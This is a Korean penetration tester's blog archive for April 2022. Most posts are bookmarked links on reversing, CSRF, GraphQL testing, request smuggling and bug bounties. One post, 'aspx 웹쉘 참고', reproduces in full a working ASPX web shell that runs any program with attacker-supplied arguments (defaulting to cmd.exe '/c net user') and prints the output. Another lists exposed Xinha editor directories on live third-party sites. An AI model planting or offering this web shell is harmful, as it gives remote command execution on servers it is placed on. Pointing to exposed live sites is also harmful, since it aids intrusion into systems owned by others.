'2022/04'에 해당되는 글 17건

EAT IAT 계산

리버싱 2022. 4. 25. 13:28

 

https://idlecomputer.tistory.com/182

 

[reversing] EAT(Export Address Table) (기타 = 세션 찾기 64bit pe viwer)

EAT (Export Address Table) Windows 운영체제에서 라이브러리(Library) 란 다른 프로그램에서 불러 쓸 수 있도록 관련 함수들을 모아놓은 파일(DLL/SYS)입니다. Win32 API 가 대표적인 Library 이며, 그 중에서..

idlecomputer.tistory.com

 

 

 

'리버싱' 카테고리의 다른 글

IAT & EAT 정리  (0) 2022.04.27
RVA to RWA 쉽게 계산하기 [펌]  (0) 2022.04.27
C#은 SecureSting 클래스  (0) 2021.07.09
.Net De'obfuscator 분석(진행 중)  (0) 2020.11.08
게임 해킹 띠오리(경로)  (0) 2020.11.02
블로그 이미지

wtdsoul

,

CSRF 참고 hacktricks

2022. 4. 23. 14:15

https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery

 

CSRF (Cross Site Request Forgery) - HackTricks

Steal CSRF Token and send a Post request using an iframe, a form and Ajax

book.hacktricks.xyz

 

 

'' 카테고리의 다른 글

wordpress 대표적인 취약점 정리  (0) 2022.04.29
Wordpress 정리  (0) 2022.04.29
graphql insql  (0) 2022.04.23
xinha 에디터 추가  (0) 2022.04.20
aspx 웹쉘 참고  (0) 2022.04.19
블로그 이미지

wtdsoul

,

graphql insql

2022. 4. 23. 13:18

https://github.com/doyensec/inql

 

GitHub - doyensec/inql: InQL - A Burp Extension for GraphQL Security Testing

InQL - A Burp Extension for GraphQL Security Testing - GitHub - doyensec/inql: InQL - A Burp Extension for GraphQL Security Testing

github.com

https://blog.assetnote.io/2021/08/29/exploiting-graphql/

 

Exploiting GraphQL

Application security issues found by Assetnote

blog.assetnote.io

 

https://www.jython.org/download

 

Downloads

The Python runtime on the JVM

www.jython.org

 

https://book.hacktricks.xyz/pentesting/pentesting-web/graphql

 

GraphQL - HackTricks

If you can search by a string type, like: query={theusers(description: ""){username,password}} and you search for an empty string it will dump all data. (Note this example isn't related with the example of the tutorials, for this example suppose you can se

book.hacktricks.xyz

 

 

'' 카테고리의 다른 글

Wordpress 정리  (0) 2022.04.29
CSRF 참고 hacktricks  (0) 2022.04.23
xinha 에디터 추가  (0) 2022.04.20
aspx 웹쉘 참고  (0) 2022.04.19
HTTP Request Smuggling  (0) 2022.04.09
블로그 이미지

wtdsoul

,

xinha 에디터 추가

2022. 4. 20. 15:36

http://neon.com.my/editor/xinha/examples/

 

Index of /editor/xinha/examples

 

neon.com.my

http://neon.com.my/editor/xinha/plugins/GetHtml/

 

Index of /editor/xinha/plugins/GetHtml

 

neon.com.my

https://als.uam.edu.pa/xinha/plugins/ImageManager/

 

 

'' 카테고리의 다른 글

CSRF 참고 hacktricks  (0) 2022.04.23
graphql insql  (0) 2022.04.23
aspx 웹쉘 참고  (0) 2022.04.19
HTTP Request Smuggling  (0) 2022.04.09
서버버전 정보 노출 대응방안  (0) 2022.02.25
블로그 이미지

wtdsoul

,

aspx 웹쉘 참고

2022. 4. 19. 14:44

https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx

 

GitHub - tennc/webshell: This is a webshell open source project

This is a webshell open source project. Contribute to tennc/webshell development by creating an account on GitHub.

github.com

 

   
  <%@ Page Language="VB" Debug="true" %>
  <%@ import Namespace="system.IO" %>
  <%@ import Namespace="System.Diagnostics" %>
   
  <script runat="server">
   
  Sub RunCmd(Src As Object, E As EventArgs)
  Dim myProcess As New Process()
  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
  myProcessStartInfo.UseShellExecute = false
  myProcessStartInfo.RedirectStandardOutput = true
  myProcess.StartInfo = myProcessStartInfo
  myProcessStartInfo.Arguments=xcmd.text
  myProcess.Start()
   
  Dim myStreamReader As StreamReader = myProcess.StandardOutput
  Dim myString As String = myStreamReader.Readtoend()
  myProcess.Close()
  mystring=replace(mystring,"<","&lt;")
  mystring=replace(mystring,">","&gt;")
  result.text= vbcrlf & "<pre>" & mystring & "</pre>"
  End Sub
   
  </script>
   
  <html>
  <body>
  <form runat="server">
  <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
  <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
  <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
  <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
  <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
  <p><asp:Label id="result" runat="server"></asp:Label>
  </form>
  </body>
  </html>

'' 카테고리의 다른 글

graphql insql  (0) 2022.04.23
xinha 에디터 추가  (0) 2022.04.20
HTTP Request Smuggling  (0) 2022.04.09
서버버전 정보 노출 대응방안  (0) 2022.02.25
SSTF Github  (0) 2022.02.23
블로그 이미지

wtdsoul

,

https://skymavis.notion.site/Sky-Mavis-Bug-Bounty-Program-ef33b18c4ee14eaab4698a8efd2c9992

'Bug Bounty' 카테고리의 다른 글

Zendesk Bug Bounty  (0) 2023.05.15
apple-vulnerability-bug-bounty  (0) 2021.06.29
안전하지 않은 직접 객체 참조 (IDOR 공격)  (0) 2021.06.29
apple 버그바운티 사례  (0) 2021.01.17
국내 버그바운티 진행 (ex. 해킹존)  (0) 2021.01.17
블로그 이미지

wtdsoul

,

HTTP Request Smuggling

2022. 4. 9. 12:32

https://hackyboiz.github.io/2022/03/06/syru/funny-smuggling-story-pt2/

 

 

 

'' 카테고리의 다른 글

xinha 에디터 추가  (0) 2022.04.20
aspx 웹쉘 참고  (0) 2022.04.19
서버버전 정보 노출 대응방안  (0) 2022.02.25
SSTF Github  (0) 2022.02.23
LDAP 인젝션  (0) 2022.01.20
블로그 이미지

wtdsoul

,